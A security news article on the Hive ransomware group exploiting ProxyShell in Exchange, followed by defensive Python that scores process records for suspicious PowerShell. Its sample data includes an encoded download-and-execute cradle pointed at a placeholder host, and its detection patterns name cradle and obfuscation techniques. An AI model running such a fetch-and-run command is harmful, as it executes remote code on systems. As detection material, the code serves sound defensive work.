The Hive ransomware group has been targeting organizations in the financial, energy and healthcare sectors since June 2021 as part of a coordinated ransomware campaign.
In these attacks, the group exploits the ProxyShell vulnerabilities in Microsoft Exchange Server to execute arbitrary commands remotely, then encrypts the victim company's data with its own ransomware strain.
The group is highly organized: the Varonis research team recently found that the threat actor managed to enter an organization's environment and encrypt target data with the ransomware strain in less than 72 hours.
These attacks are particularly relevant because unpatched Exchange servers can be discovered by public web crawlers. "Anyone with an unpatched Exchange server is at risk," said Peter Firstbrook, a Gartner analyst.
"Organizations that have migrated to the cloud version of Exchange still have some on-premises Exchange servers that can be used if not patched. There are already threats circulating and unpatched servers can be detected by web crawlers, so it is very likely that unpatched servers will be exploited," Firstbrook added.
How much risk does ProxyShell present?
Despite the severity of these vulnerabilities, many organizations have failed to patch their on-premises Exchange servers (the vulnerabilities do not affect Exchange Online or Office 365).
Last year, Mandiant reported that about 30,000 Exchange servers were unpatched, and recent attacks have shown that many organizations have been slow to update their systems.
This is problematic because the vulnerabilities enable an attacker to execute arbitrary commands and malicious code remotely on the Microsoft Exchange server over port 443.
"Attackers continue to exploit the ProxyShell vulnerabilities, which were first disclosed more than eight months ago," said Claire Tills, a senior research engineer at Tenable. She added that, despite patches being available, the vulnerabilities have proven to be a reliable resource for attackers ever since their disclosure.
"Recent attacks by Hive ransomware group affiliates have been enabled by the ubiquity of Microsoft Exchange and, apparently, by delays in patching these months-old vulnerabilities. Organizations around the world use Microsoft Exchange across a variety of industries for critical business tasks, making it an ideal target for threat actors."
According to Tills, organizations that have not yet patched their Exchange servers need to act immediately to limit attackers' opportunities to perform reconnaissance on and infiltrate target systems.
Looking for ProxyShell intrusions
Organizations that are slow to patch, such as those with less mature or short-staffed IT teams, can easily fall into the trap of thinking that, because there are no obvious signs of intrusion, no one has used ProxyShell to gain a foothold in the environment. That is not necessarily the case.
Firstbrook notes that "it will be clear to organizations when ransomware attacks occur, although there are many other attack techniques that [are] more hidden, so the absence of ransomware does not mean that the Exchange server has not already been compromised."
It is for this reason that Red Canary's chief information security expert Brian Donohue recommends that organizations make sure they can detect the execution of Cobalt Strike or Mimikatz, even if they cannot update Exchange.
"Having comprehensive defense in depth against a wide range of threats means that if you can't patch your Exchange servers, or if an adversary is using purely novel tradecraft in certain parts of the attack, you can still catch Mimikatz activity, or you could have an alert looking for very obfuscated PowerShell in use, something that happens before anything is encrypted," Donohue said.
In other words, enterprises that have not yet patched the vulnerabilities can still protect themselves by using managed detection and response and other security solutions to detect malicious activity before the ransomware encryption stage, so they can respond before it is too late.
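As an added illustration of the kind of detection Donohue describes (example code written for this article, not Red Canary's or any vendor's own logic), the following Python scores constructed process-creation records for the indicators mentioned above: PowerShell launched by the IIS worker process that serves Exchange's web endpoints, encoded or obfuscated command lines, and download-and-execute cradles. The record format, the weights, the threshold and the w3wp.exe parent check are assumptions, and the sample events are constructed rather than taken from any real incident.

```python
import base64
import re

# Indicators the detection advice above turns on (constructed, illustrative patterns).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CRADLE = re.compile(r"(?i)invoke-expression|\biex\b|downloadstring|downloadfile|frombase64string|net\.webclient")
OBFUSCATION = re.compile(r"(?i)`[a-z]|\[char\]\s*\d+|-join\b|\{\d+\}\s*-f")
STEALTH_FLAGS = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b")
WEB_WORKERS = {"w3wp.exe"}  # IIS worker process; assumes telemetry reports the parent image name

def decode_encoded_command(cmd):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE, so there is no decoded script to inspect

def score_event(event):
    """Score one process-creation record; independent indicators stack."""
    cmd = event["cmd"]
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + (decoded or "")  # inspect the decoded script as well as the raw line
    checks = [
        (3, "PowerShell spawned by IIS worker process", event.get("parent", "").lower() in WEB_WORKERS),
        (2, "encoded command line", decoded is not None),
        (3, "download/execute cradle", bool(CRADLE.search(text))),
        (2, "obfuscation tokens", bool(OBFUSCATION.search(text))),
        (1, "hidden/non-interactive flags", bool(STEALTH_FLAGS.search(cmd))),
    ]
    hits = [(w, why) for w, why, hit in checks if hit]
    return sum(w for w, _ in hits), [why for _, why in hits]

def triage(events, threshold=5):
    # Flag only records whose stacked indicators reach the threshold: (host, score, reasons).
    scored = [(ev["host"], *score_event(ev)) for ev in events]
    return [r for r in scored if r[1] >= threshold]

def _encode(script):  # build a -EncodedCommand argument the way PowerShell expects it
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed, illustrative process-creation records (not telemetry from the attacks described).
SAMPLE_EVENTS = [
    {"host": "exch01", "parent": "w3wp.exe", "cmd": "powershell.exe -nop -w hidden -enc " + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')")},
    {"host": "ws17", "parent": "explorer.exe", "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"host": "ws22", "parent": "svchost.exe", "cmd": "powershell.exe -EncodedCommand " + _encode("Get-Service | Out-File C:\\logs\\svc.txt")},
]
```

Note that an encoded command on its own (the third record) stays below the threshold; it is the combination of a web-server parent, encoding, a cradle and stealth flags that makes the first record stand out, which is the "before encryption" window Donohue refers to.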